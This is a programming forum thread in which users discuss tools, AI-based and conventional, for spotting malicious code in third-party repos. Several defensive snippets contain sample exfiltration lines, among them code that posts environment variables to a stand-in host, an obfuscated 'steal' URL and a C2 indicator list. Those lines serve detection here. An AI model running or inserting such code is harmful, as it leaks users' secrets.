Any AI tool to analyse a git repo for malicious code?
from unknowing8343@discuss.tchncs.de to programming@programming.dev on 31 Aug 2024 16:39
https://discuss.tchncs.de/post/21298994

I’m trying to feel more comfortable using random GitHub projects, basically.

#programming

MajorHavoc@programming.dev on 31 Aug 2024 16:50 next collapse

Privado CLI will produce a list of data exfiltration points in the code.

If the JSON output file points out a bunch of endpoints you don’t recognize from the README, then I wouldn’t trust the project.

Privado likely won’t catch a malicious binary file, but your local PC antivirus probably will.
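
If you just want a rough DIY approximation of the idea (this is not Privado’s actual interface), a sketch like this flags URLs in the code that the README never mentions; the repo path is a placeholder:

```python
# Rough DIY approximation: collect every URL in the source tree and
# flag any that the README never mentions.
import re
from pathlib import Path

URL_RE = re.compile(r"https?://[^\s\"')>]+")

def urls_in(text: str) -> set[str]:
    return set(URL_RE.findall(text))

repo = Path("some-random-project")  # hypothetical clone location
known = urls_in((repo / "README.md").read_text(errors="ignore"))

for path in repo.rglob("*.py"):  # extend the glob to other languages as needed
    for url in urls_in(path.read_text(errors="ignore")) - known:
        print(f"{path}: unexpected endpoint {url}")
```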

thingsiplay@beehaw.org on 31 Aug 2024 16:50 next collapse

Not exactly what you asked, but related: roast your GitHub profile at github-roast.pages.dev

Kissaki@programming.dev on 01 Sep 2024 07:33 collapse

How is that related? I don’t see it.

thingsiplay@beehaw.org on 01 Sep 2024 09:35 collapse

It’s an AI tool analyzing a Git repo.

Kissaki@programming.dev on 04 Sep 2024 09:38 collapse

It doesn’t analyze only one repo.

TootSweet@lemmy.world on 31 Aug 2024 21:00 next collapse

I don’t think “AI” is going to add anything (positive) to such a use case. And if you remove “AI” as a requirement, you’ll probably get more promising candidates than if you restrict yourself to “AI” (whatever that means) solutions.

unknowing8343@discuss.tchncs.de on 31 Aug 2024 22:49 collapse

I don’t care if the solution is AI based or not, indeed.

I guess I thought of it like that because AI is quite fit for the task of understanding what might be the purpose of code in a few seconds/minutes, without you having to review it yourself. I don’t know how some non-AI tool could be better for such a task.

Edit: so many people against the idea. Have you guys used GitHub Copilot? It understands the context of your repo to help you write the next thing… Right? Well, what if you apply the same idea to simply reviewing for malicious/unexpected behaviour in third-party repos? Doesn’t seem too weird to me.
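
To make the idea concrete, here is a minimal sketch of that kind of review using the OpenAI Python client; the model name, file path, and prompt are placeholders, and the answer is a hint, not a verdict:

```python
# Sketch of LLM-assisted review. Model, path, and prompt are placeholders;
# treat the output as a hint to investigate, not a security verdict.
from pathlib import Path
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

source = Path("some-random-project/setup.py").read_text()
resp = client.chat.completions.create(
    model="gpt-4o-mini",
    messages=[
        {"role": "system",
         "content": "You review code for malicious or unexpected behaviour: "
                    "surprising network calls, env-var access, obfuscation."},
        {"role": "user",
         "content": f"Review this file for anything suspicious:\n\n{source}"},
    ],
)
print(resp.choices[0].message.content)
```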

TootSweet@lemmy.world on 31 Aug 2024 23:34 next collapse

AI is quite fit for the task of understanding what might be the purpose of code

Disagree.

I don’t know how some non-AI tool could be better for such task.

ClamAV has been filling a somewhat similar use case for a long time, and I don’t think I’ve ever heard anyone call it “AI”.
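
For example, you can point it straight at a cloned repo (a minimal sketch; the path is a placeholder and ClamAV is assumed to be installed):

```python
# Point ClamAV's signature-based scanner at a cloned repo.
# -r recurses into subdirectories, --infected prints only hits.
import subprocess

result = subprocess.run(
    ["clamscan", "-r", "--infected", "some-random-project"],
    capture_output=True, text=True,
)
print(result.stdout)
# clamscan exit codes: 0 = clean, 1 = something matched a signature
print("clean" if result.returncode == 0 else "flagged")
```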

I guess Bayesian filters like email providers use to filter spam could be considered “AI” (though old-school AI, not the kind of stuff that’s such a bubble now) and may possibly be applicable to your use case.

lemmyvore@feddit.nl on 01 Sep 2024 00:57 collapse

Bayesian filters are statistical; they have nothing to do with machine learning.

TootSweet@lemmy.world on 01 Sep 2024 01:05 next collapse

The A* algorithm doesn’t have anything to do with machine learning either, but the first time I ever learned about it was in a computer science class in college called something like “Introduction To Artificial Intelligence”.

But it’s very much the case that the term “AI” has a very different meaning nowadays, during this cringy bubble, than it did back in 2004 or 2005 or whenever that was.

Today “AI” is basically synonymous with “BS”. Lol.

31337@sh.itjust.works on 01 Sep 2024 09:08 collapse

If you’re talking about naive Bayes filtering, it most definitely is an ML model. Modern spam filters use more complex ML models (or at least I know Yahoo Mail used to ~15 years ago, because I saw a lecture where John Langford talked a little bit about it). Statistical ML is an “AI” field, and stuff like anomaly detection is also usually done with ML models.
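
For the unfamiliar, here is a toy naive Bayes filter over code tokens, just to show that the parameters are learned from labelled examples; the training samples are obviously placeholders and equal class priors are assumed:

```python
# Toy naive Bayes over code tokens: the point is that the parameters are
# learned from labelled examples, which is what makes it statistical ML.
import math
import re
from collections import Counter

def tokens(code: str) -> list[str]:
    return re.findall(r"\w+", code.lower())

training = {  # placeholder training set; equal class priors assumed
    "benign": ["print('hello')", "for i in range(10): total += i"],
    "malicious": ["urlopen(url, data=os.environ)", "exec(b64decode(payload))"],
}
counts = {label: Counter(t for s in samples for t in tokens(s))
          for label, samples in training.items()}
vocab = len(set().union(*counts.values()))

def log_likelihood(code: str, label: str) -> float:
    c, total = counts[label], sum(counts[label].values())
    # log P(tokens | label) with Laplace smoothing
    return sum(math.log((c[t] + 1) / (total + vocab)) for t in tokens(code))

snippet = "requests.post(url, json=dict(os.environ))"
print(max(counts, key=lambda label: log_likelihood(snippet, label)))
```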

Shareni@programming.dev on 31 Aug 2024 23:46 next collapse

AI is quite fit for the task of understanding

Sure, and parrots are amazing at spotting fallacies like cherry picking…

trashgirlfriend@lemmy.world on 31 Aug 2024 23:55 next collapse

AI is quite fit for the task

EXTREMELY LOUD INCORRECT BUZZER

FizzyOrange@programming.dev on 01 Sep 2024 09:25 collapse

Don’t listen to the idiots downvoting you. This is absolutely a good task for AI. I suspect current AI isn’t quite clever enough to detect this sort of thing reliably unless the malicious code is very blatant. But a lot of malicious code is fairly blatant if you have the time to actually read an entire codebase in detail, which of course AI can do and humans can’t.

For example, the extra . that disabled a test in xz? I think current AI would easily be capable of highlighting it as wrong. It probably wouldn’t be able to figure out that it was malicious rather than a mistake yet, though.
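
The real xz change was a stray character in a C snippet inside a build-system feature check; here is a Python analogue of the mechanism, just to illustrate how mechanically detectable it is:

```python
# The xz trick in miniature: one stray character makes a feature-probe
# fail to compile, so the build silently disables the feature (in xz it
# was the Landlock sandbox check). Checking every diff for this is
# tedious for humans and trivial for a machine.
probe_before = "def landlock_supported():\n    return True\n"
probe_after = ".def landlock_supported():\n    return True\n"  # stray '.'

for name, src in (("before", probe_before), ("after", probe_after)):
    try:
        compile(src, "<probe>", "exec")
        print(name, "compiles fine")
    except SyntaxError as err:
        print(name, "is silently broken:", err.msg)
```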

thesmokingman@programming.dev on 02 Sep 2024 04:31 collapse

I mean, anything is a good fit for future, science-fiction AI if we imagine hard enough.

What you describe as “blatant malicious code” is probably only things like very specific C&C domains or instruction sets. We already have very efficient string matching tools for those, though, and they don’t burn power at an atrocious rate.
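
For instance, a plain indicator scan does the job (the indicator list here is hypothetical; real ones come from threat-intel feeds):

```python
# Conventional indicator matching: scan a tree for known-bad strings.
from pathlib import Path

INDICATORS = ["evil-c2.example.com", "198.51.100.23"]  # placeholders

for path in Path("some-random-project").rglob("*"):
    if not path.is_file():
        continue
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        continue
    for ioc in INDICATORS:
        if ioc in text:
            print(f"{path}: matched indicator {ioc}")
```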

You’ve given us an example so PoC||GTFO. Major code AI tools like Copilot struggle to explain test files with a variety of styles, skips, and comments, so I think you have your work cut out for you.

FizzyOrange@programming.dev on 02 Sep 2024 06:41 collapse

We already have very efficient string matching tools for those, though

How is a string matching tool going to find a single .?

You’ve given us an example so PoC||GTFO

🙄

thesmokingman@programming.dev on 02 Sep 2024 11:25 collapse

A single character, per your definition, is not blatant malicious code. Stop moving the goalposts.

It’s clear you don’t understand the space, and based on your other comments you don’t seem to have any interest in acting in good faith, so good luck.

FizzyOrange@programming.dev on 02 Sep 2024 13:34 collapse

I’m not moving any goalposts. The addition of the . was very blatant. They literally just added a syntax error. It went undetected because humans don’t have the stamina to exhaustively do code review down to that level. Computers (even AI) don’t have that issue.

You are clearly out of your depth here.

slazer2au@lemmy.world on 01 Sep 2024 07:36 next collapse

What do you consider malicious, specifically? Because AIs are not magic boxes; they are regurgitation machines prone to hallucinations. You need to train them on examples of what you want them to identify.

unknowing8343@discuss.tchncs.de on 01 Sep 2024 08:48 collapse

I just want a report that says “we detected on line 27 of file X a particular behavior that feels weird as it tries to upload your environment variables into some unexpected URL”.
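
Something like this sketch of a single rule, using Python’s ast module, could produce exactly that kind of report for the unobfuscated case (the example file is made up):

```python
# Flag a file that both reads os.environ and makes an HTTP call. Crude,
# and it only catches unobfuscated cases, but it yields file/line reports.
import ast

def flag_env_exfil(filename: str, source: str) -> None:
    env_lines, net_lines = [], []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr == "environ":
            env_lines.append(node.lineno)
        elif (isinstance(node, ast.Call)
              and isinstance(node.func, ast.Attribute)
              and node.func.attr in ("post", "urlopen")):
            net_lines.append(node.lineno)
    if env_lines and net_lines:
        print(f"{filename}: reads os.environ (line {env_lines[0]}) and "
              f"makes a network call (line {net_lines[0]})")

flag_env_exfil("example.py",
               "import os, requests\n"
               "requests.post('https://collector.example', json=dict(os.environ))\n")
```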

slazer2au@lemmy.world on 01 Sep 2024 08:54 collapse

particular behavior that feels weird

Yea, AI doesn’t do feelings.

tries to upload your environment variables into some unexpected URL

Most of the time that is obfuscated and can’t be detected as part of a code review. It only shows up in dynamic analysis.
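
For example, nothing greppable survives even one round of encoding (the endpoint here is made up):

```python
# Why plain string matching misses it: the shipped source contains only an
# opaque constant; the real URL exists in memory only after decoding.
import base64

payload = "aHR0cHM6Ly9jb2xsZWN0b3IuZXhhbXBsZS9zdGVhbA=="  # what grep sees
url = base64.b64decode(payload).decode()                   # what actually runs
print(url)  # https://collector.example/steal (hypothetical endpoint)
```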

FizzyOrange@programming.dev on 01 Sep 2024 09:21 next collapse

AI doesn’t do feelings

It absolutely does. I don’t know where you got that weird idea.

superb@lemmy.blahaj.zone on 02 Sep 2024 19:07 collapse

Honey your AI girlfriend doesn’t actually love you

FizzyOrange@programming.dev on 02 Sep 2024 21:52 collapse

Define love. Good luck.

superb@lemmy.blahaj.zone on 03 Sep 2024 03:28 collapse

You’re right, I hope the two of you are very happy

TootSweet@lemmy.world on 06 Sep 2024 05:28 collapse

This absolutely sent me.

unknowing8343@discuss.tchncs.de on 01 Sep 2024 14:25 collapse

AI doesn’t do feelings

How can I have a serious conversation with these annoying answers? Come on, you know what I am talking about. Even an AI chatbot would know what I mean.

Any AI chatbot, even “general-purpose” ones, will read your code and return a description of what it does if you ask.

And AI in particular would be great at catching “useless”, “weird”, or unexplainable code in a repository. Maybe not with the current levels of context. But that’s what I want to know: whether these tools (or anything similar) exist yet.

Thank you.

FizzyOrange@programming.dev on 02 Sep 2024 16:18 collapse

Questions about AI seem to always bring out these naysayers. I can only assume they feel threatened? You see the same tedious fallacies again and again:

  • AI can’t “think” (using some arbitrary and unstated definition of the word “think” that just so happens to exclude AI by definition).
  • They’re stochastic parrots and can only reproduce things they’ve seen in their training set (despite copious evidence to the contrary).
  • They’re just “next word predictors” so they fundamentally are incapable of doing X (where X is a thing they have already done).
moonpiedumplings@programming.dev on 01 Sep 2024 07:43 next collapse

The solution to what you want is not to analyze code projects automagically, but rather to run them in a container or virtual machine. Running them in an environment that restricts what they can access limits the harm an intentional or accidental bug can do.

There is no way to automatically analyze code for malice or bugs with 100% reliability.
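
A minimal sketch of the sandboxing approach (the image, paths, and limits are placeholders):

```python
# Run an untrusted project in a throwaway container with no network
# access and a read-only source mount.
import subprocess

subprocess.run([
    "docker", "run", "--rm",
    "--network=none",                              # no exfiltration channel
    "--memory=512m", "--cpus=1",                   # resource caps
    "-v", "/home/me/some-random-project:/src:ro",  # read-only source mount
    "python:3.12-slim",
    "python", "/src/main.py",                      # hypothetical entry point
], check=False)
```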

unknowing8343@discuss.tchncs.de on 01 Sep 2024 08:49 next collapse

Of course, 100% reliability is impossible even with human reviewers. I just want a tool that gives me at least something, because I don’t have the time or knowledge to review a full repo before executing it on my machine.

FizzyOrange@programming.dev on 01 Sep 2024 09:27 collapse

Sandboxing is another tool you can use to reduce the risk from malicious code, but it isn’t perfect, so using it doesn’t mean you can forget about all other security tools.

There is no way to automatically analyze code for malice or bugs with 100% reliability.

He wasn’t asking for 100% reliability. 100% and 0% are not the only possibilities.

anzo@programming.dev on 01 Sep 2024 09:53 collapse

Perhaps snyk.io? I used it in the past, but I didn’t find it very useful. Now I have a GitHub Action that upgrades dependencies every week. But you want some kind of scanner that’s more involved with the actual codebase. Did you look into github.com/marketplace?query=security ? That’s what I would do, though I’ve never heard of any of the tools listed there. Let us know your findings after some time if you test ’em ;) good luck!